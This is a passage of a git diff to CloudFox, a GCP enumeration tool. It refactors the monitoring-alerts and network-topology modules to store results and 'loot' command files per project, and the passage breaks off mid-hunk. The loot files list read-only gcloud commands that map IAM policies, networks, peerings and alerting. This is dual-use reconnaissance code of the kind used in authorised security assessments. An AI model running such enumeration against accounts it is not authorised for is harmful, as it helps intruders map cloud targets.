AlertPolicies []AlertPolicy - NotificationChannels []NotificationChannel - UptimeChecks []UptimeCheck - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectAlertPolicies map[string][]AlertPolicy // projectID -> policies + ProjectNotificationChannels map[string][]NotificationChannel // projectID -> channels + ProjectUptimeChecks map[string][]UptimeCheck // projectID -> checks + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -142,16 +142,13 @@ func runGCPMonitoringAlertsCommand(cmd *cobra.Command, args []string) { // Create module instance module := &MonitoringAlertsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - AlertPolicies: []AlertPolicy{}, - NotificationChannels: []NotificationChannel{}, - UptimeChecks: []UptimeCheck{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectAlertPolicies: make(map[string][]AlertPolicy), + ProjectNotificationChannels: make(map[string][]NotificationChannel), + ProjectUptimeChecks: make(map[string][]UptimeCheck), + LootMap: make(map[string]map[string]*internal.LootFile), } - // Initialize loot files - module.initializeLootFiles() - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -191,17 +188,45 @@ func (m *MonitoringAlertsModule) Execute(ctx context.Context, logger internal.Lo } // Check results - if len(m.AlertPolicies) == 0 && len(m.NotificationChannels) == 0 { + allPolicies := m.getAllAlertPolicies() + allChannels := m.getAllNotificationChannels() + allChecks := m.getAllUptimeChecks() + + if len(allPolicies) == 0 && len(allChannels) == 0 { logger.InfoM("No monitoring alerts or notification channels found", GCP_MONITORINGALERTS_MODULE_NAME) return } logger.SuccessM(fmt.Sprintf("Found %d alert policy(ies), %d notification channel(s), %d uptime check(s)", - len(m.AlertPolicies), len(m.NotificationChannels), len(m.UptimeChecks)), GCP_MONITORINGALERTS_MODULE_NAME) + len(allPolicies), len(allChannels), len(allChecks)), GCP_MONITORINGALERTS_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *MonitoringAlertsModule) getAllAlertPolicies() []AlertPolicy { + var all []AlertPolicy + for _, policies := range m.ProjectAlertPolicies { + all = append(all, policies...) + } + return all +} + +func (m *MonitoringAlertsModule) getAllNotificationChannels() []NotificationChannel { + var all []NotificationChannel + for _, channels := range m.ProjectNotificationChannels { + all = append(all, channels...) + } + return all +} + +func (m *MonitoringAlertsModule) getAllUptimeChecks() []UptimeCheck { + var all []UptimeCheck + for _, checks := range m.ProjectUptimeChecks { + all = append(all, checks...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -210,6 +235,17 @@ func (m *MonitoringAlertsModule) processProject(ctx context.Context, projectID s logger.InfoM(fmt.Sprintf("Enumerating monitoring for project: %s", projectID), GCP_MONITORINGALERTS_MODULE_NAME) } + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["monitoring-alerts-commands"] = &internal.LootFile{ + Name: "monitoring-alerts-commands", + Contents: "# Monitoring Alerts Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + // List alert policies m.enumerateAlertPolicies(ctx, projectID, alertClient, logger) @@ -291,7 +327,7 @@ func (m *MonitoringAlertsModule) enumerateAlertPolicies(ctx context.Context, pro } m.mu.Lock() - m.AlertPolicies = append(m.AlertPolicies, alertPolicy) + m.ProjectAlertPolicies[projectID] = append(m.ProjectAlertPolicies[projectID], alertPolicy) m.mu.Unlock() } } @@ -343,7 +379,7 @@ func (m *MonitoringAlertsModule) enumerateNotificationChannels(ctx context.Conte } m.mu.Lock() - m.NotificationChannels = append(m.NotificationChannels, notifChannel) + m.ProjectNotificationChannels[projectID] = append(m.ProjectNotificationChannels[projectID], notifChannel) m.mu.Unlock() } } @@ -418,7 +454,7 @@ func (m *MonitoringAlertsModule) enumerateUptimeChecks(ctx context.Context, proj } m.mu.Lock() - m.UptimeChecks = append(m.UptimeChecks, uptimeCheck) + m.ProjectUptimeChecks[projectID] = append(m.ProjectUptimeChecks[projectID], uptimeCheck) m.mu.Unlock() } } @@ -443,30 +479,61 @@ func (m *MonitoringAlertsModule) extractMetricType(filter string) string { // ------------------------------ // Loot File Management // ------------------------------ -func (m *MonitoringAlertsModule) initializeLootFiles() { - m.LootMap["monitoring-alerts-commands"] = &internal.LootFile{ - Name: "monitoring-alerts-commands", - Contents: "# Monitoring Alerts Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *MonitoringAlertsModule) addPolicyToLoot(projectID string, p AlertPolicy) { + lootFile := m.LootMap[projectID]["monitoring-alerts-commands"] + if lootFile == nil { + return } + lootFile.Contents += fmt.Sprintf( + "## Policy: %s (Project: %s)\n"+ + "# Describe alert policy:\n"+ + "gcloud alpha monitoring policies describe %s --project=%s\n\n", + p.DisplayName, p.ProjectID, + extractResourceName(p.Name), p.ProjectID, + ) +} + +func (m *MonitoringAlertsModule) addChannelToLoot(projectID string, c NotificationChannel) { + lootFile := m.LootMap[projectID]["monitoring-alerts-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "## Channel: %s (Project: %s)\n"+ + "# Describe notification channel:\n"+ + "gcloud alpha monitoring channels describe %s --project=%s\n\n", + c.DisplayName, c.ProjectID, + extractResourceName(c.Name), c.ProjectID, + ) +} + +func (m *MonitoringAlertsModule) addUptimeCheckToLoot(projectID string, u UptimeCheck) { + lootFile := m.LootMap[projectID]["monitoring-alerts-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "## Uptime Check: %s (Project: %s)\n"+ + "# Describe uptime check:\n"+ + "gcloud alpha monitoring uptime describe %s --project=%s\n\n", + u.DisplayName, u.ProjectID, + extractResourceName(u.Name), u.ProjectID, + ) } // ------------------------------ // Output Generation // ------------------------------ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Build notification channel name map for resolving channel references - channelNameMap := make(map[string]string) - for _, c := range m.NotificationChannels { - channelNameMap[c.Name] = c.DisplayName + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) } +} - // Sort policies by name - sort.Slice(m.AlertPolicies, func(i, j int) bool { - return m.AlertPolicies[i].DisplayName < m.AlertPolicies[j].DisplayName - }) - - // Alert Policies table - one row per condition - policiesHeader := []string{ +func (m *MonitoringAlertsModule) getPoliciesHeader() []string { + return []string{ "Project Name", "Project ID", "Policy Name", @@ -478,16 +545,45 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna "Duration", "Notification Channels", } +} + +func (m *MonitoringAlertsModule) getChannelsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Channel Name", + "Type", + "Enabled", + "Verified", + "Destination", + } +} - var policiesBody [][]string - for _, p := range m.AlertPolicies { +func (m *MonitoringAlertsModule) getUptimeHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Check Name", + "Enabled", + "Host", + "Protocol", + "Port", + "Path", + "Period", + "Timeout", + "SSL Enabled", + } +} + +func (m *MonitoringAlertsModule) policiesToTableBody(policies []AlertPolicy, channelNameMap map[string]string) [][]string { + var body [][]string + for _, p := range policies { // Resolve notification channel names var channelNames []string for _, channelRef := range p.NotificationChannels { if name, ok := channelNameMap[channelRef]; ok { channelNames = append(channelNames, name) } else { - // Extract name from resource path if not found parts := strings.Split(channelRef, "/") if len(parts) > 0 { channelNames = append(channelNames, parts[len(parts)-1]) @@ -499,7 +595,6 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna notificationChannelsStr = strings.Join(channelNames, ", ") } - // If policy has conditions, create one row per condition if len(p.Conditions) > 0 { for _, cond := range p.Conditions { metricType := cond.MetricType @@ -519,7 +614,7 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna duration = "-" } - policiesBody = append(policiesBody, []string{ + body = append(body, []string{ m.GetProjectName(p.ProjectID), p.ProjectID, p.DisplayName, @@ -533,8 +628,7 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna }) } } else { - // Policy with no conditions - single row - policiesBody = append(policiesBody, []string{ + body = append(body, []string{ m.GetProjectName(p.ProjectID), p.ProjectID, p.DisplayName, @@ -547,34 +641,15 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna notificationChannelsStr, }) } - - // Add to loot - m.LootMap["monitoring-alerts-commands"].Contents += fmt.Sprintf( - "## Policy: %s (Project: %s)\n"+ - "# Describe alert policy:\n"+ - "gcloud alpha monitoring policies describe %s --project=%s\n\n", - p.DisplayName, p.ProjectID, - extractResourceName(p.Name), p.ProjectID, - ) - } - - // Notification Channels table - with destination info - channelsHeader := []string{ - "Project Name", - "Project ID", - "Channel Name", - "Type", - "Enabled", - "Verified", - "Destination", } + return body +} - var channelsBody [][]string - for _, c := range m.NotificationChannels { - // Extract destination from labels based on type +func (m *MonitoringAlertsModule) channelsToTableBody(channels []NotificationChannel) [][]string { + var body [][]string + for _, c := range channels { destination := extractChannelDestination(c.Type, c.Labels) - - channelsBody = append(channelsBody, []string{ + body = append(body, []string{ m.GetProjectName(c.ProjectID), c.ProjectID, c.DisplayName, @@ -583,34 +658,13 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna boolToYesNo(c.Verified), destination, }) - - // Add to loot - m.LootMap["monitoring-alerts-commands"].Contents += fmt.Sprintf( - "## Channel: %s (Project: %s)\n"+ - "# Describe notification channel:\n"+ - "gcloud alpha monitoring channels describe %s --project=%s\n\n", - c.DisplayName, c.ProjectID, - extractResourceName(c.Name), c.ProjectID, - ) - } - - // Uptime Checks table - expanded - uptimeHeader := []string{ - "Project Name", - "Project ID", - "Check Name", - "Enabled", - "Host", - "Protocol", - "Port", - "Path", - "Period", - "Timeout", - "SSL Enabled", } + return body +} - var uptimeBody [][]string - for _, u := range m.UptimeChecks { +func (m *MonitoringAlertsModule) uptimeToTableBody(checks []UptimeCheck) [][]string { + var body [][]string + for _, u := range checks { host := u.MonitoredHost if host == "" { host = "-" @@ -624,7 +678,7 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna timeout = "-" } - uptimeBody = append(uptimeBody, []string{ + body = append(body, []string{ m.GetProjectName(u.ProjectID), u.ProjectID, u.DisplayName, @@ -637,64 +691,180 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna timeout, boolToYesNo(u.SSLEnabled), }) + } + return body +} - // Add to loot - m.LootMap["monitoring-alerts-commands"].Contents += fmt.Sprintf( - "## Uptime Check: %s (Project: %s)\n"+ - "# Describe uptime check:\n"+ - "gcloud alpha monitoring uptime describe %s --project=%s\n\n", - u.DisplayName, u.ProjectID, - extractResourceName(u.Name), u.ProjectID, - ) +func (m *MonitoringAlertsModule) buildTablesForProject(projectID string, channelNameMap map[string]string) []internal.TableFile { + var tableFiles []internal.TableFile + + if policies, ok := m.ProjectAlertPolicies[projectID]; ok && len(policies) > 0 { + sort.Slice(policies, func(i, j int) bool { + return policies[i].DisplayName < policies[j].DisplayName + }) + tableFiles = append(tableFiles, internal.TableFile{ + Name: "alerting-policies", + Header: m.getPoliciesHeader(), + Body: m.policiesToTableBody(policies, channelNameMap), + }) + for _, p := range policies { + m.addPolicyToLoot(projectID, p) + } } - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) + if channels, ok := m.ProjectNotificationChannels[projectID]; ok && len(channels) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "notification-channels", + Header: m.getChannelsHeader(), + Body: m.channelsToTableBody(channels), + }) + for _, c := range channels { + m.addChannelToLoot(projectID, c) + } + } + + if checks, ok := m.ProjectUptimeChecks[projectID]; ok && len(checks) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "uptime-checks", + Header: m.getUptimeHeader(), + Body: m.uptimeToTableBody(checks), + }) + for _, u := range checks { + m.addUptimeCheckToLoot(projectID, u) + } + } + + return tableFiles +} + +func (m *MonitoringAlertsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Build notification channel name map + channelNameMap := make(map[string]string) + for _, channels := range m.ProjectNotificationChannels { + for _, c := range channels { + channelNameMap[c.Name] = c.DisplayName + } + } + + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectAlertPolicies { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectNotificationChannels { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectUptimeChecks { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID, channelNameMap) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = MonitoringAlertsOutput{Table: tableFiles, Loot: lootFiles} } - // Build tables + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + } +} + +func (m *MonitoringAlertsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + // Build notification channel name map + channelNameMap := make(map[string]string) + for _, channels := range m.ProjectNotificationChannels { + for _, c := range channels { + channelNameMap[c.Name] = c.DisplayName + } + } + + allPolicies := m.getAllAlertPolicies() + allChannels := m.getAllNotificationChannels() + allChecks := m.getAllUptimeChecks() + + sort.Slice(allPolicies, func(i, j int) bool { + return allPolicies[i].DisplayName < allPolicies[j].DisplayName + }) + var tables []internal.TableFile - if len(policiesBody) > 0 { + if len(allPolicies) > 0 { tables = append(tables, internal.TableFile{ Name: "alerting-policies", - Header: policiesHeader, - Body: policiesBody, + Header: m.getPoliciesHeader(), + Body: m.policiesToTableBody(allPolicies, channelNameMap), }) } - if len(channelsBody) > 0 { + if len(allChannels) > 0 { tables = append(tables, internal.TableFile{ Name: "notification-channels", - Header: channelsHeader, - Body: channelsBody, + Header: m.getChannelsHeader(), + Body: m.channelsToTableBody(allChannels), }) } - if len(uptimeBody) > 0 { + if len(allChecks) > 0 { tables = append(tables, internal.TableFile{ Name: "uptime-checks", - Header: uptimeHeader, - Body: uptimeBody, + Header: m.getUptimeHeader(), + Body: m.uptimeToTableBody(allChecks), }) } + // Populate loot for flat output + for projectID, policies := range m.ProjectAlertPolicies { + for _, p := range policies { + m.addPolicyToLoot(projectID, p) + } + } + for projectID, channels := range m.ProjectNotificationChannels { + for _, c := range channels { + m.addChannelToLoot(projectID, c) + } + } + for projectID, checks := range m.ProjectUptimeChecks { + for _, u := range checks { + m.addUptimeCheckToLoot(projectID, u) + } + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + output := MonitoringAlertsOutput{ Table: tables, Loot: lootFiles, } - // Build scope names using project names scopeNames := make([]string, len(m.ProjectIDs)) for i, projectID := range m.ProjectIDs { scopeNames[i] = m.GetProjectName(projectID) } - // Write output err := internal.HandleOutputSmart( "gcp", m.Format, diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go index dd28c62c..7d90de5a 100644 --- a/gcp/commands/networktopology.go +++ b/gcp/commands/networktopology.go @@ -133,14 +133,14 @@ type NetworkRoute struct { type NetworkTopologyModule struct { gcpinternal.BaseGCPModule - Networks []VPCNetwork - Subnets []Subnet - Peerings []VPCPeering - SharedVPCs map[string]*SharedVPCConfig - NATs []CloudNATConfig - Routes []NetworkRoute - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectNetworks map[string][]VPCNetwork // projectID -> networks + ProjectSubnets map[string][]Subnet // projectID -> subnets + ProjectPeerings map[string][]VPCPeering // projectID -> peerings + ProjectNATs map[string][]CloudNATConfig // projectID -> NATs + ProjectRoutes map[string][]NetworkRoute // projectID -> routes + SharedVPCs map[string]*SharedVPCConfig // hostProjectID -> config + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -166,19 +166,16 @@ func runGCPNetworkTopologyCommand(cmd *cobra.Command, args []string) { // Create module instance module := &NetworkTopologyModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Networks: []VPCNetwork{}, - Subnets: []Subnet{}, - Peerings: []VPCPeering{}, - SharedVPCs: make(map[string]*SharedVPCConfig), - NATs: []CloudNATConfig{}, - Routes: []NetworkRoute{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectNetworks: make(map[string][]VPCNetwork), + ProjectSubnets: make(map[string][]Subnet), + ProjectPeerings: make(map[string][]VPCPeering), + ProjectNATs: make(map[string][]CloudNATConfig), + ProjectRoutes: make(map[string][]NetworkRoute), + SharedVPCs: make(map[string]*SharedVPCConfig), + LootMap: make(map[string]map[string]*internal.LootFile), } - // Initialize loot files - module.initializeLootFiles() - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -206,17 +203,62 @@ func (m *NetworkTopologyModule) Execute(ctx context.Context, logger internal.Log wg.Wait() // Check results - if len(m.Networks) == 0 { + allNetworks := m.getAllNetworks() + if len(allNetworks) == 0 { logger.InfoM("No VPC networks found", GCP_NETWORKTOPOLOGY_MODULE_NAME) return } + allSubnets := m.getAllSubnets() + allPeerings := m.getAllPeerings() + allNATs := m.getAllNATs() + logger.SuccessM(fmt.Sprintf("Found %d VPC network(s), %d subnet(s), %d peering(s), %d Cloud NAT(s)", - len(m.Networks), len(m.Subnets), len(m.Peerings), len(m.NATs)), GCP_NETWORKTOPOLOGY_MODULE_NAME) + len(allNetworks), len(allSubnets), len(allPeerings), len(allNATs)), GCP_NETWORKTOPOLOGY_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *NetworkTopologyModule) getAllNetworks() []VPCNetwork { + var all []VPCNetwork + for _, networks := range m.ProjectNetworks { + all = append(all, networks...) + } + return all +} + +func (m *NetworkTopologyModule) getAllSubnets() []Subnet { + var all []Subnet + for _, subnets := range m.ProjectSubnets { + all = append(all, subnets...) + } + return all +} + +func (m *NetworkTopologyModule) getAllPeerings() []VPCPeering { + var all []VPCPeering + for _, peerings := range m.ProjectPeerings { + all = append(all, peerings...) + } + return all +} + +func (m *NetworkTopologyModule) getAllNATs() []CloudNATConfig { + var all []CloudNATConfig + for _, nats := range m.ProjectNATs { + all = append(all, nats...) + } + return all +} + +func (m *NetworkTopologyModule) getAllRoutes() []NetworkRoute { + var all []NetworkRoute + for _, routes := range m.ProjectRoutes { + all = append(all, routes...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -225,6 +267,17 @@ func (m *NetworkTopologyModule) processProject(ctx context.Context, projectID st logger.InfoM(fmt.Sprintf("Enumerating networks for project: %s", projectID), GCP_NETWORKTOPOLOGY_MODULE_NAME) } + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["network-topology-commands"] = &internal.LootFile{ + Name: "network-topology-commands", + Contents: "# Network Topology Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + // List networks m.enumerateNetworks(ctx, projectID, computeService, logger) @@ -276,12 +329,12 @@ func (m *NetworkTopologyModule) enumerateNetworks(ctx context.Context, projectID peeringRecord.PeerProjectID = m.extractProjectFromURL(peering.Network) m.mu.Lock() - m.Peerings = append(m.Peerings, peeringRecord) + m.ProjectPeerings[projectID] = append(m.ProjectPeerings[projectID], peeringRecord) m.mu.Unlock() } m.mu.Lock() - m.Networks = append(m.Networks, vpc) + m.ProjectNetworks[projectID] = append(m.ProjectNetworks[projectID], vpc) m.mu.Unlock() } return nil @@ -333,7 +386,7 @@ func (m *NetworkTopologyModule) enumerateSubnets(ctx context.Context, projectID subnetRecord.IAMBindings = m.getSubnetIAMBindings(ctx, computeService, projectID, regionName, subnet.Name) m.mu.Lock() - m.Subnets = append(m.Subnets, subnetRecord) + m.ProjectSubnets[projectID] = append(m.ProjectSubnets[projectID], subnetRecord) m.mu.Unlock() } } @@ -408,7 +461,7 @@ func (m *NetworkTopologyModule) enumerateRoutes(ctx context.Context, projectID s } m.mu.Lock() - m.Routes = append(m.Routes, routeRecord) + m.ProjectRoutes[projectID] = append(m.ProjectRoutes[projectID], routeRecord) m.mu.Unlock() } return nil @@ -456,7 +509,7 @@ func (m *NetworkTopologyModule) enumerateCloudNAT(ctx context.Context, projectID } m.mu.Lock() - m.NATs = append(m.NATs, natRecord) + m.ProjectNATs[projectID] = append(m.ProjectNATs[projectID], natRecord) m.mu.Unlock() } } @@ -508,12 +561,15 @@ func (m *NetworkTopologyModule) checkSharedVPCHost(ctx context.Context, projectI } // Mark host networks - for i := range m.Networks { - if m.Networks[i].ProjectID == projectID { - m.Networks[i].IsSharedVPC = true - m.Networks[i].SharedVPCRole = "host" + m.mu.Lock() + if networks, ok := m.ProjectNetworks[projectID]; ok { + for i := range networks { + networks[i].IsSharedVPC = true + networks[i].SharedVPCRole = "host" } + m.ProjectNetworks[projectID] = networks } + m.mu.Unlock() } } @@ -559,27 +615,116 @@ func (m *NetworkTopologyModule) extractRegionFromURL(url string) string { // ------------------------------ // Loot File Management // ------------------------------ -func (m *NetworkTopologyModule) initializeLootFiles() { - m.LootMap["network-topology-commands"] = &internal.LootFile{ - Name: "network-topology-commands", - Contents: "# Network Topology Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *NetworkTopologyModule) addNetworkToLoot(projectID string, n VPCNetwork) { + lootFile := m.LootMap[projectID]["network-topology-commands"] + if lootFile == nil { + return } + lootFile.Contents += fmt.Sprintf( + "## VPC Network: %s (Project: %s)\n"+ + "# Describe network:\n"+ + "gcloud compute networks describe %s --project=%s\n\n"+ + "# List subnets in network:\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n\n"+ + "# List firewall rules for network:\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", + n.Name, n.ProjectID, + n.Name, n.ProjectID, + n.Name, n.ProjectID, + n.Name, n.ProjectID, + ) +} + +func (m *NetworkTopologyModule) addSubnetToLoot(projectID string, s Subnet) { + lootFile := m.LootMap[projectID]["network-topology-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "## Subnet: %s (Project: %s, Region: %s)\n"+ + "# Describe subnet:\n"+ + "gcloud compute networks subnets describe %s --region=%s --project=%s\n\n"+ + "# Get subnet IAM policy:\n"+ + "gcloud compute networks subnets get-iam-policy %s --region=%s --project=%s\n\n", + s.Name, s.ProjectID, s.Region, + s.Name, s.Region, s.ProjectID, + s.Name, s.Region, s.ProjectID, + ) +} + +func (m *NetworkTopologyModule) addPeeringToLoot(projectID string, p VPCPeering) { + lootFile := m.LootMap[projectID]["network-topology-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "## VPC Peering: %s (Project: %s)\n"+ + "# Local: %s -> Peer: %s (project: %s)\n"+ + "# List peerings:\n"+ + "gcloud compute networks peerings list --project=%s\n\n"+ + "# List peering routes (incoming):\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=INCOMING\n\n"+ + "# List peering routes (outgoing):\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=OUTGOING\n\n", + p.Name, p.ProjectID, + m.extractNetworkName(p.Network), m.extractNetworkName(p.PeerNetwork), p.PeerProjectID, + p.ProjectID, + p.Name, p.ProjectID, m.extractNetworkName(p.Network), + p.Name, p.ProjectID, m.extractNetworkName(p.Network), + ) +} + +func (m *NetworkTopologyModule) addNATToLoot(projectID string, nat CloudNATConfig) { + lootFile := m.LootMap[projectID]["network-topology-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "## Cloud NAT: %s (Project: %s, Region: %s)\n"+ + "# Describe router with NAT config:\n"+ + "gcloud compute routers describe ROUTER_NAME --region=%s --project=%s\n\n"+ + "# List NAT mappings:\n"+ + "gcloud compute routers get-nat-mapping-info ROUTER_NAME --region=%s --project=%s\n\n", + nat.Name, nat.ProjectID, nat.Region, + nat.Region, nat.ProjectID, + nat.Region, nat.ProjectID, + ) +} + +func (m *NetworkTopologyModule) addSharedVPCToLoot(projectID string, config *SharedVPCConfig) { + lootFile := m.LootMap[projectID]["network-topology-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "## Shared VPC Host: %s\n"+ + "# Service Projects: %v\n"+ + "# List Shared VPC resources:\n"+ + "gcloud compute shared-vpc list-associated-resources %s\n\n"+ + "# Get host project for service project:\n"+ + "gcloud compute shared-vpc get-host-project SERVICE_PROJECT_ID\n\n"+ + "# List usable subnets for service project:\n"+ + "gcloud compute networks subnets list-usable --project=%s\n\n", + projectID, + config.ServiceProjects, + projectID, + projectID, + ) } // ------------------------------ // Output Generation // ------------------------------ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Sort networks by project and name - sort.Slice(m.Networks, func(i, j int) bool { - if m.Networks[i].ProjectID != m.Networks[j].ProjectID { - return m.Networks[i].ProjectID < m.Networks[j].ProjectID - } - return m.Networks[i].Name < m.Networks[j].Name - }) + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} - // VPC Networks table - networksHeader := []string{ +func (m *NetworkTopologyModule) getNetworksHeader() []string { + return []string{ "Project Name", "Project ID", "Network", @@ -589,15 +734,59 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal "Shared VPC", "MTU", } +} + +func (m *NetworkTopologyModule) getSubnetsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Subnet", + "Network", + "Region", + "CIDR", + "Private Google Access", + "Flow Logs", + "Purpose", + "Resource Role", + "Resource Principal", + } +} + +func (m *NetworkTopologyModule) getPeeringsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Local Network", + "Peer Network", + "Peer Project", + "State", + "Import Routes", + "Export Routes", + } +} - var networksBody [][]string - for _, n := range m.Networks { +func (m *NetworkTopologyModule) getNATHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Network", + "NAT IPs", + "Logging", + } +} + +func (m *NetworkTopologyModule) networksToTableBody(networks []VPCNetwork) [][]string { + var body [][]string + for _, n := range networks { sharedVPC := "-" if n.IsSharedVPC { sharedVPC = n.SharedVPCRole } - networksBody = append(networksBody, []string{ + body = append(body, []string{ m.GetProjectName(n.ProjectID), n.ProjectID, n.Name, @@ -607,40 +796,13 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal sharedVPC, fmt.Sprintf("%d", n.MTU), }) - - // Add network commands to loot - m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( - "## VPC Network: %s (Project: %s)\n"+ - "# Describe network:\n"+ - "gcloud compute networks describe %s --project=%s\n\n"+ - "# List subnets in network:\n"+ - "gcloud compute networks subnets list --network=%s --project=%s\n\n"+ - "# List firewall rules for network:\n"+ - "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", - n.Name, n.ProjectID, - n.Name, n.ProjectID, - n.Name, n.ProjectID, - n.Name, n.ProjectID, - ) - } - - // Subnets table - one row per IAM binding if present, otherwise one row per subnet - subnetsHeader := []string{ - "Project Name", - "Project ID", - "Subnet", - "Network", - "Region", - "CIDR", - "Private Google Access", - "Flow Logs", - "Purpose", - "IAM Role", - "IAM Member", } + return body +} - var subnetsBody [][]string - for _, s := range m.Subnets { +func (m *NetworkTopologyModule) subnetsToTableBody(subnets []Subnet) [][]string { + var body [][]string + for _, s := range subnets { purpose := s.Purpose if purpose == "" { purpose = "PRIVATE" @@ -649,7 +811,7 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal if len(s.IAMBindings) > 0 { // One row per IAM binding for _, binding := range s.IAMBindings { - subnetsBody = append(subnetsBody, []string{ + body = append(body, []string{ m.GetProjectName(s.ProjectID), s.ProjectID, s.Name, @@ -665,7 +827,7 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal } } else { // No IAM bindings - single row - subnetsBody = append(subnetsBody, []string{ + body = append(body, []string{ m.GetProjectName(s.ProjectID), s.ProjectID, s.Name, @@ -679,36 +841,14 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal "-", }) } - - // Add subnet commands to loot - m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( - "## Subnet: %s (Project: %s, Region: %s)\n"+ - "# Describe subnet:\n"+ - "gcloud compute networks subnets describe %s --region=%s --project=%s\n\n"+ - "# Get subnet IAM policy:\n"+ - "gcloud compute networks subnets get-iam-policy %s --region=%s --project=%s\n\n", - s.Name, s.ProjectID, s.Region, - s.Name, s.Region, s.ProjectID, - s.Name, s.Region, s.ProjectID, - ) - } - - // VPC Peerings table - peeringsHeader := []string{ - 